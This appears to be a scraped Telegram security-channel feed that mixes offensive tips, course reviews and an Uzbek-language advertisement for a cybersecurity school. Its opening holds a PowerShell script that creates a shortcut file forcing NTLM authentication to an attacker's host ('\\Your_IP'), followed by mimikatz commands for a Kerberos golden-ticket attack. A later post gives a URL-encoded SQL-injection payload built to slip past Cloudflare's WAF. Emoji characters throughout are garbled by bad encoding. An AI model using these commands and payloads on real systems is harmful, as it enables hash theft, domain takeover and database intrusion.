$objShell = New-Object -ComObject WScript.shell
$lnk = $objShell.CreateShortcut("C:\test.lnk")
$lnk.TargetPath = "\\Your_IP\@test.png"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "Test"
$lnk.HotKey = "Ctrl+Alt+T"
$lnk.Save()
Additional resources for forced authentication: https://www.ired.team/offensive-security/initial-access/t1187-forced-authentication#execution-via-.rtf
#LNK_File_Attack
www.ired.team
Forced Authentication | Red Team Notes
Credential Access, Stealing hashes
1. mimikatz # privilege::debug
2. lsadump::lsa /inject /name:krbtgt
We need NTLM hash and sid
3. mimikatz # kerberos::golden /User:Administrator /domain:marvel.local /sid:S-1-5-21-1139169715-366527789-3857901133 /krbtgt:4793b8acca133d3b82c5c96438996d68 /id:500 /ptt
#Golden_Ticket_Attack
BTL1 Blue Team Level 1, the blue team OSCP? An expletive laden review of the comprehensive defense fundamentals course, from someone who passed with 100% on their first attempt!
I passed on my first attempt with 100%, this is my review:https://medium.com/@seccult/btl1-blue-team-level-1-the-blue-team-oscp-3c09ca5f1f8c
Discuss on Reddit: https://ift.tt/OkCcf2r
@blueteamalerts
I passed on my first attempt with 100%, this is my review:https://medium.com/@seccult/btl1-blue-team-level-1-the-blue-team-oscp-3c09ca5f1f8c
Discuss on Reddit: https://ift.tt/OkCcf2r
@blueteamalerts
Medium
BTL1 Blue Team Level 1, the blue team OSCP?
I recently completed the BTL1 course material, and challenged, and passed the associated exam with a perfect 100%!
PoC for CVE-2025-48799, an elevation of privilege vulnerability in Windows Update service.
https://github.com/Wh04m1001/CVE-2025-48799/
https://github.com/Wh04m1001/CVE-2025-48799/
Forwarded from Brut Security
π‘οΈ Bug Bounty Tip: Cloudflare 403 Bypass for Time-Based Blind SQLi
When your payload gets blocked by Cloudflare (403), try obfuscation with URL encoding to sneak it past!
β Blocked Payload
β Bypass Payload
π This obfuscation can help trigger Time-Based Blind SQLi even when WAF protection is in place.
β Credit: @nav1n0x
When your payload gets blocked by Cloudflare (403), try obfuscation with URL encoding to sneak it past!
β Blocked Payload
(select(0)from(select(sleep(10)))v) β 403 Forbidden
β Bypass Payload
(select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'%5C"%2B(select(0)from(select(sleep(6)))v)
π This obfuscation can help trigger Time-Based Blind SQLi even when WAF protection is in place.
β Credit: @nav1n0x
Forwarded from Turan Security
This media is not supported in your browser
VIEW IN TELEGRAM
Do'stlar, ko'pchiligingiz uzoq kutgan yangilikni e'lon qilamiz. Turan Security kiberxavfsizlik tashkiloti haqiqiy amaliyotga asoslangan maxsus kiberxavfsizlik kurslariga qabulni ochdi!
Sizda endi qaysi o'quv markazida o'qisam ekan degan savollar bo'lmaydi.
Hujumkor va himoyaviy kiberxavfsizlikni sohaning haqiqiy egalaridan o'rganing. 7 yildan ortiq tajriba va xalqaro sertifikatga ega tajribali mutaxassislar mentorlik qiladi. Bundan tashqari Turan Security mutaxassislari tomonidan amaliyot darslari tashkil qilinadi.
Qabul qilinadigan o'quvchilarimiz:
Umumiy 2 oylik Foundation bosqichida boshlang'ich IT asoslar, tarmoq va linux administratorligi bo'yicha maxsus bilimlarga ega bo'lishadi.
π» Ushbu bosqichni muvaffaqiyatli tugatgan o'quvchilarga 6 oy davomida ikki yo'nalish, hujumkor (red team) va himoyaviy (blue team) kiberxavfsizlik bo'yicha amaliyotga asoslangan maxsus bilimlar beriladi.
π΄ Red Team: Hujumkor kiberxavfsizlik yo'nalishida tashkilot veb-saytlari, ichki axborot tizimlari va tarmoq tizimlaridagi zaifliklarni aniqlash. Aniqlangan zaifliklardan foydalanib ma'lumotlarga ega bo'lish va qanday qilib zaifliklarni oldini olish bo'yicha bilimlar beriladi.
π΅ Blue Team: Himoyaviy kiberxavfsizlik yo'nalishida esa tashkilot ichki va tashqi tizimlarida aniqlangan zaifliklarni oldini olish, kiberxavfsizlik hodisalarini aniqlash va ularni tahlil qilish, xavflarni aniqlovchi tizimlarni o'rnatish va ularni monitoring qilish bo'yicha amaliy bilimlar beriladi.
O'qishni xohlovchilar batafsil ma'lumot uchun adminga murojaat qiling!
π¦ π¦ π¦
@TuranSecurity | www.turansec.uz | [email protected]
Sizda endi qaysi o'quv markazida o'qisam ekan degan savollar bo'lmaydi.
Hujumkor va himoyaviy kiberxavfsizlikni sohaning haqiqiy egalaridan o'rganing. 7 yildan ortiq tajriba va xalqaro sertifikatga ega tajribali mutaxassislar mentorlik qiladi. Bundan tashqari Turan Security mutaxassislari tomonidan amaliyot darslari tashkil qilinadi.
Qabul qilinadigan o'quvchilarimiz:
Umumiy 2 oylik Foundation bosqichida boshlang'ich IT asoslar, tarmoq va linux administratorligi bo'yicha maxsus bilimlarga ega bo'lishadi.
O'qishni xohlovchilar batafsil ma'lumot uchun adminga murojaat qiling!
@TuranSecurity | www.turansec.uz | [email protected]
Please open Telegram to view this post
VIEW IN TELEGRAM
π₯3